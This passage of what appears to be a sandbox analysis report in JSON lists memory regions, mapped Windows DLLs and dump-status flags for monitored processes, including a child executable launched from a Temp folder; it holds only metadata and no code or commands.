"timestamp": "00:05:13.159", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 35061760, "type": "region", "version": 1 }, "end_va": 38006783, "entry_point": 35061760, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_3014", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 35061760, "timestamp": "00:05:13.160", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 5177344, "type": "region", "version": 1 }, "end_va": 5439487, "entry_point": 0, "filename": null, "id": "region_3015", "name": "private_0x00000000004f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 5177344, "timestamp": "00:05:13.184", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 9502720, "type": "region", "version": 1 }, "end_va": 9764863, "entry_point": 0, "filename": null, "id": "region_3016", "name": "private_0x0000000000910000", "norm_filename": null, "region_type": "private_memory", "start_va": 9502720, "timestamp": "00:05:13.184", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 38076416, "type": "region", "version": 1 }, "end_va": 38338559, "entry_point": 0, "filename": null, "id": "region_3017", "name": "private_0x0000000002450000", "norm_filename": null, "region_type": "private_memory", "start_va": 38076416, "timestamp": "00:05:13.184", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 38535168, "type": "region", "version": 1 }, "end_va": 38797311, "entry_point": 0, "filename": null, "id": "region_3018", "name": "private_0x00000000024c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 38535168, "timestamp": "00:05:13.184", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 38862848, "type": "region", "version": 1 }, "end_va": 39124991, "entry_point": 0, "filename": null, "id": "region_3019", "name": "private_0x0000000002510000", "norm_filename": null, "region_type": "private_memory", "start_va": 38862848, "timestamp": "00:05:13.184", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 39124992, "type": "region", "version": 1 }, "end_va": 39387135, "entry_point": 0, "filename": null, "id": "region_3020", "name": "private_0x0000000002550000", "norm_filename": null, "region_type": "private_memory", "start_va": 39124992, "timestamp": "00:05:13.184", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 39649280, "type": "region", "version": 1 }, "end_va": 39911423, "entry_point": 0, "filename": null, "id": "region_3021", "name": "private_0x00000000025d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 39649280, "timestamp": "00:05:13.184", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 40173568, "type": "region", "version": 1 }, "end_va": 40435711, "entry_point": 0, "filename": null, "id": "region_3022", "name": "private_0x0000000002650000", "norm_filename": null, "region_type": "private_memory", "start_va": 40173568, "timestamp": "00:05:13.184", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 40828928, "type": "region", "version": 1 }, "end_va": 41091071, "entry_point": 0, "filename": null, "id": "region_3023", "name": "private_0x00000000026f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 40828928, "timestamp": "00:05:13.185", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 41353216, "type": "region", "version": 1 }, "end_va": 41615359, "entry_point": 0, "filename": null, "id": "region_3024", "name": "private_0x0000000002770000", "norm_filename": null, "region_type": "private_memory", "start_va": 41353216, "timestamp": "00:05:13.185", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 42008576, "type": "region", "version": 1 }, "end_va": 42270719, "entry_point": 0, "filename": null, "id": "region_3025", "name": "private_0x0000000002810000", "norm_filename": null, "region_type": "private_memory", "start_va": 42008576, "timestamp": "00:05:13.185", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 42270720, "type": "region", "version": 1 }, "end_va": 42532863, "entry_point": 0, "filename": null, "id": "region_3026", "name": "private_0x0000000002850000", "norm_filename": null, "region_type": "private_memory", "start_va": 42270720, "timestamp": "00:05:13.185", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 42532864, "type": "region", "version": 1 }, "end_va": 42795007, "entry_point": 0, "filename": null, "id": "region_3027", "name": "private_0x0000000002890000", "norm_filename": null, "region_type": "private_memory", "start_va": 42532864, "timestamp": "00:05:13.185", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 43188224, "type": "region", "version": 1 }, "end_va": 43450367, "entry_point": 0, "filename": null, "id": "region_3028", "name": "private_0x0000000002930000", "norm_filename": null, "region_type": "private_memory", "start_va": 43188224, "timestamp": "00:05:13.185", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130305024, "type": "region", "version": 1 }, "end_va": 2130317311, "entry_point": 0, "filename": null, "id": "region_3029", "name": "private_0x000000007ef9e000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130305024, "timestamp": "00:05:13.185", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130317312, "type": "region", "version": 1 }, "end_va": 2130329599, "entry_point": 0, "filename": null, "id": "region_3030", "name": "private_0x000000007efa1000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130317312, "timestamp": "00:05:13.185", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130329600, "type": "region", "version": 1 }, "end_va": 2130341887, "entry_point": 0, "filename": null, "id": "region_3031", "name": "private_0x000000007efa4000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130329600, "timestamp": "00:05:13.185", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130341888, "type": "region", "version": 1 }, "end_va": 2130354175, "entry_point": 0, "filename": null, "id": "region_3032", "name": "private_0x000000007efa7000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130341888, "timestamp": "00:05:13.185", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130354176, "type": "region", "version": 1 }, "end_va": 2130366463, "entry_point": 0, "filename": null, "id": "region_3033", "name": "private_0x000000007efaa000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130354176, "timestamp": "00:05:13.185", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130366464, "type": "region", "version": 1 }, "end_va": 2130378751, "entry_point": 0, "filename": null, "id": "region_3034", "name": "private_0x000000007efad000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130366464, "timestamp": "00:05:13.185", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130530304, "type": "region", "version": 1 }, "end_va": 2130542591, "entry_point": 0, "filename": null, "id": "region_3035", "name": "private_0x000000007efd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130530304, "timestamp": "00:05:13.185", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 593919, "entry_point": 0, "filename": null, "id": "region_3036", "name": "private_0x0000000000090000", "norm_filename": null, "region_type": "private_memory", "start_va": 589824, "timestamp": "00:05:13.186", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 49152, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 638975, "entry_point": 0, "filename": null, "id": "region_3549", "name": "private_0x0000000000090000", "norm_filename": null, "region_type": "private_memory", "start_va": 589824, "timestamp": "00:05:15.471", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 196608, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 786431, "entry_point": 0, "filename": null, "id": "region_3832", "name": "private_0x0000000000090000", "norm_filename": null, "region_type": "private_memory", "start_va": 589824, "timestamp": "00:05:29.399", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upde25b4796.exe\"", "filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\upde25b4796.exe", "id": "proc_20", "image_name": "upde25b4796.exe", "monitor_reason": "child_process", "monitored_id": 20, "origin_monitor_id": 16, "ref_parent_process": { "ref_id": "proc_16", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_3565", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:05:18.063", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_3566", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:05:18.063", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_3567", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:05:18.063", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 589823, "entry_point": 0, "filename": null, "id": "region_3568", "name": "private_0x0000000000050000", "norm_filename": null, "region_type": "private_memory", "start_va": 327680, "timestamp": "00:05:18.063", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 1638399, "entry_point": 0, "filename": null, "id": "region_3569", "name": "private_0x0000000000090000", "norm_filename": null, "region_type": "private_memory", "start_va": 589824, "timestamp": "00:05:18.063", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 1638400, "type": "region", "version": 1 }, "end_va": 1654783, "entry_point": 0, "filename": null, "id": "region_3570", "name": "pagefile_0x0000000000190000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1638400, "timestamp": "00:05:18.063", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 208896, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4403199, "entry_point": 4194304, "filename": "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upde25b4796.exe", "id": "region_3571", "name": "upde25b4796.exe", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\temp\\upde25b4796.exe", "region_type": "memory_mapped_file", "start_va": 4194304, "timestamp": "00:05:18.063", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2007826432, "type": "region", "version": 1 }, "end_va": 2009567231, "entry_point": 2007826432, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_3572", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2007826432, "timestamp": "00:05:18.064", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 2009792512, "type": "region", "version": 1 }, "end_va": 2011365375, "entry_point": 2009792512, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_3573", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2009792512, "timestamp": "00:05:18.064", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_3574", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:05:18.064", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_3575", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:05:18.064", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_3576", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:05:18.064", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_3577", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:05:18.064", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_3578", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:05:18.065", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_3579", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:05:18.065", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_3580", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:05:18.065", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2949119, "entry_point": 0, "filename": null, "id": "region_3581", "name": "private_0x0000000000250000", "norm_filename": null, "region_type": "private_memory", "start_va": 2424832, "timestamp": "00:05:18.068", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1950154752, "type": "region", "version": 1 }, "end_va": 1950187519, "entry_point": 1950154752, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_3582", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1950154752, "timestamp": "00:05:18.068", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1950220288, "type": "region", "version": 1 }, "end_va": 1950597119, "entry_point": 1950220288, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_3583", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1950220288, "timestamp": "00:05:18.068", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1950613504, "type": "region", "version": 1 }, "end_va": 1950871551, "entry_point": 1950613504, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_3584", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1950613504, "timestamp": "00:05:18.068", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_3585", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:05:18.082", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 1703936, "type": "region", "version": 1 }, "end_va": 2125823, "entry_point": 1703936, "filename": "\\Windows\\System32\\locale.nls", "id": "region_3586", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 1703936, "timestamp": "00:05:18.082", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 3932160, "type": "region", "version": 1 }, "end_va": 3997695, "entry_point": 0, "filename": null, "id": "region_3587", "name": "private_0x00000000003c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3932160, "timestamp": "00:05:18.082", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 5177344, "type": "region", "version": 1 }, "end_va": 6225919, "entry_point": 0, "filename": null, "id": "region_3588", "name": "private_0x00000000004f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 5177344, "timestamp": "00:05:18.082", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1388544, "start_va": 1922301952, "type": "region", "version": 1 }, "end_va": 1923690495, "entry_point": 1922301952, "filename": "\\Windows\\SysWOW64\\msvbvm60.dll", "id": "region_3589", "name": "msvbvm60.dll", "norm_filename": "c:\\windows\\syswow64\\msvbvm60.dll", "region_type": "memory_mapped_file", "start_va": 1922301952, "timestamp": "00:05:18.082", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1971322880, "type": "region", "version": 1 }, "end_va": 1971372031, "entry_point": 1971322880, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_3590", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1971322880, "timestamp": "00:05:18.082", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1971388416, "type": "region", "version": 1 }, "end_va": 1971781631, "entry_point": 1971388416, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_3591", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1971388416, "timestamp": "00:05:18.082", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1972109312, "type": "region", "version": 1 }, "end_va": 1973157887, "entry_point": 1972109312, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_3592", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1972109312, "timestamp": "00:05:18.082", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1973157888, "type": "region", "version": 1 }, "end_va": 1974271999, "entry_point": 1973157888, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_3593", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1973157888, "timestamp": "00:05:18.082", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1974337536, "type": "region", "version": 1 }, "end_va": 1975762943, "entry_point": 1974337536, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_3594", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1974337536, "timestamp": "00:05:18.082", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1978073088, "type": "region", "version": 1 }, "end_va": 1978777599, "entry_point": 1978073088, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_3595", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1978073088, "timestamp": "00:05:18.082", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1980825600, "type": "region", "version": 1 }, "end_va": 1981468671, "entry_point": 1980825600, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_3596", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1980825600, "timestamp": "00:05:18.082", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1981480960, "type": "region", "version": 1 }, "end_va": 1982066687, "entry_point": 1981480960, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_3597", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1981480960, "timestamp": "00:05:18.082", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1986265088, "type": "region", "version": 1 }, "end_va": 1986551807, "entry_point": 1986265088, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_3598", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1986265088, "timestamp": "00:05:18.082", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1987903488, "type": "region", "version": 1 }, "end_va": 1988005887, "entry_point": 1987903488, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_3599", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1987903488, "timestamp": "00:05:18.082", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1988100096, "type": "region", "version": 1 }, "end_va": 1989083135, "entry_point": 1988100096, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_3600", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1988100096, "timestamp": "00:05:18.082", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1989083136, "type": "region", "version": 1 }, "end_va": 1989124095, "entry_point": 1989083136, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_3601", "name": 